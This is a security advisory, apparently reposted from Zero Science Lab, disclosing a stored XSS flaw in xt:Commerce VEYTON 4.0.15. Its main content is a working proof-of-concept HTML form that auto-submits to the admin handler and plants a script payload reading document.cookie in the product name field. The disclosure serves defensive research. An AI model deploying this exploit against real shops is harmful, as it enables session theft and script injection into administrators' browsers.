xt:Commerce VEYTON 4.0.15 Cross Site Scripting

2012.08.23
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!DOCTYPE html> <!-- xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability Vendor: xt:Commerce GmbH / xt:Commerce International Ltd. Product web page: http://www.xt-commerce.com Affected version: VEYTON 4.0.15 Professional/Merchant/Ultimate Summary: One shop system, many shop solutions. The shop software xt:Commerce 4 is the basic framework for online shops and for merchants who install and configure their own shop. Desc: xt:Commerce suffers from a stored XSS vulnerability when parsing user input to the 'products_name_de' parameter via POST method thru '/xtAdmin/adminHandler.php' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5102 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5102.php 19.08.2012 --> <html> <head> <title>xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability</title> </head> <body> <form name="XSS" method="POST" action="http://localhost/xtAdmin/adminHandler.php?load_section=product&pg=overview&parentNode=_pnl1345421066692_7751&edit_id=6&gridHandle=productgridForm&edit_id=6&save=true"> <input type="hidden" name="date_available" value="2012-08-28 12:00:00" /> <input type="hidden" name="flag_has_specials" value="0" /> <input type="hidden" name="google_product_cat" value="New" /> <input type="hidden" name="group_permission_info" value="Ihr Rechte-System ist eingestellt auf &quot;Blacklist&quot; Wenn Sie eine Berechtigung auswhlen wird dieser Datensatz fr die Gruppe deaktiviert!" /> <input type="hidden" name="manufacturers_id" value="0" /> <input type="hidden" name="meta_description_de" value="XSS" /> <input type="hidden" name="meta_keywords_de" value="ZSL-2012-5102" /> <input type="hidden" name="meta_title_de" value="Vulnerability" /> <input type="hidden" name="permission_id" value="1" /> <input type="hidden" name="price_flag_graduated_1" value="0" /> <input type="hidden" name="price_flag_graduated_2" value="0" /> <input type="hidden" name="price_flag_graduated_3" value="0" /> <input type="hidden" name="price_flag_graduated_all" value="0" /> <input type="hidden" name="product_list_template" value="" /> <input type="hidden" name="product_template" value="" /> <input type="hidden" name="products_average_quantity" value="0" /> <input type="hidden" name="products_cmc" value="" /> <input type="hidden" name="products_description_de" value="thricer" /> <input type="hidden" name="products_ean" value="1" /> <input type="hidden" name="products_id" value="10" /> <input type="hidden" name="products_image" value="Bild" /> <input type="hidden" name="products_keywords_de" value="Zero Science Lab" /> <input type="hidden" name="products_master_model" value="" /> <input type="hidden" name="products_model" value="T-3000" /> <input type="hidden" name="products_model_old" value="T-1000" /> <input type="hidden" name="products_name_de" value='"><script>alert(document.cookie);</script>' /> <input type="hidden" name="products_option_list_temp..." value="" /> <input type="hidden" name="products_option_template" value="" /> <input type="hidden" name="products_owner" value="1" /> <input type="hidden" name="products_price" value="0" /> <input type="hidden" name="products_quantity" value="0.00" /> <input type="hidden" name="products_shippingtime" value="0" /> <input type="hidden" name="products_short_descriptio..." value="t00t" /> <input type="hidden" name="products_sort" value="0" /> <input type="hidden" name="products_startpage_sort" value="0" /> <input type="hidden" name="products_tax_class_id" value="0" /> <input type="hidden" name="products_url_de" value="www.zeroscience.mk" /> <input type="hidden" name="products_vpe" value="0" /> <input type="hidden" name="products_vpe_value" value="0.0000" /> <input type="hidden" name="products_weight" value="0.0000" /> <input type="hidden" name="shop_permission_info" value="Ihr Rechte-System ist eingestellt auf &quot;Blacklist&quot; Wenn Sie eine Berechtigung auswhlen wird dieser Datensatz fr die Gruppe deaktiviert!" /> <input type="hidden" name="total_downloads" value="0" /> <input type="hidden" name="url_text_de" value="de/a2" /> </form> <script type="text/javascript"> document.XSS.submit(); </script> </body> </html>

References:

http://www.xt-commerce.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top